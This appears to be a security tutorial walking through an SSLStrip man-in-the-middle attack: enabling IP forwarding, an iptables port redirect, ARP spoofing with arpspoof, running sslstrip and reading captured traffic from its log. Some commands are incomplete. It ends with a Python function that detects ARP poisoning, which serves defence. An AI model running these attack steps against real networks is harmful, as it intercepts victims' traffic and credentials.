MITM attack over SSL Strip HTTPS Link

MITM attack over HTTPS

In this MITM attack, SSLStrip transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, and maps those links to look-alike HTTP links or similar-looking HTTPS links.

It also supports modes for serving a favicon that looks like a lock icon, selective logging, and session denial.

Step 1: Put the machine in forwarding mode so that it forwards every packet not addressed to it.

echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2: Iptables must be set to redirect traffic from port 80 to port 8080.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Step 3: Find the network gateway.

route -n

Step 4: Find the target host's IP address.

Step 5: ARP spoofing is a technique in which an attacker sends spoofed Address Resolution Protocol (ARP) messages onto a local area network.

arpspoof -i -t

Step 6: Open a new terminal window and have sslstrip listen on port 8080.

sslstrip -l 8080

Step 7: On the victim machine, open a site such as facebook.com in the browser. Facebook normally uses HTTPS, but on the victim machine the link is now formed with HTTP.

Step 8: Go to the home folder and inspect the sslstrip.log file.
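
From the defending side, the ARP spoofing in Step 5 leaves a trace in a host's neighbour table: the gateway's IP resolves to a MAC that differs from its baseline and is shared with another host. The following Python check is an added example, not part of the original article; the sample `ip neigh show` output, the addresses and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed `ip neigh show` output (sample data, not from the page).
SAMPLE_POISONED = """\
192.168.1.1 dev eth0 lladdr 08:00:27:AA:BB:CC REACHABLE
192.168.1.23 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
192.168.1.40 dev eth0 lladdr 52:54:00:12:34:56 REACHABLE
192.168.1.77 dev eth0  FAILED
fe80::1 dev eth0 lladdr 52:54:00:99:88:77 router STALE
"""
SAMPLE_CLEAN = """\
192.168.1.1 dev eth0 lladdr 52:54:00:99:88:77 REACHABLE
192.168.1.23 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+)\s+dev\s+(?P<dev>\S+)\s+"
    r"lladdr\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b", re.I)

def parse_neigh(text):
    """Return (ip, dev, mac) for IPv4 entries with a resolved MAC address."""
    rows = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE and IPv6 lines do not match
            rows.append((m["ip"], m["dev"], m["mac"].lower()))
    return rows

def find_arp_anomalies(text, gateway_ip, known_gateway_mac=None):
    """Report signs that the gateway's ARP entry has been poisoned."""
    rows = parse_neigh(text)
    gw = [(dev, mac) for ip, dev, mac in rows if ip == gateway_ip]
    if not gw:
        return [("gateway-unresolved", gateway_ip)]
    findings = []
    by_mac = defaultdict(set)
    for ip, dev, mac in rows:
        by_mac[(dev, mac)].add(ip)
    for dev, mac in gw:
        # Sign 1: the gateway MAC differs from the recorded baseline.
        if known_gateway_mac and mac != known_gateway_mac.lower():
            findings.append(("gateway-mac-changed", mac))
        # Sign 2: another host on the same link claims the gateway's MAC.
        others = sorted(by_mac[(dev, mac)] - {gateway_ip})
        if others:
            findings.append(("gateway-mac-shared", ",".join(others)))
    return findings
```

A shared MAC can also be legitimate (a router with several addresses on the link, proxy ARP), so treat the baseline mismatch as the stronger signal.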

Mark Funk
Mark Funk is an experienced information security specialist who works with enterprises to mature and improve their enterprise security programs. Previously, he worked as a security news reporter.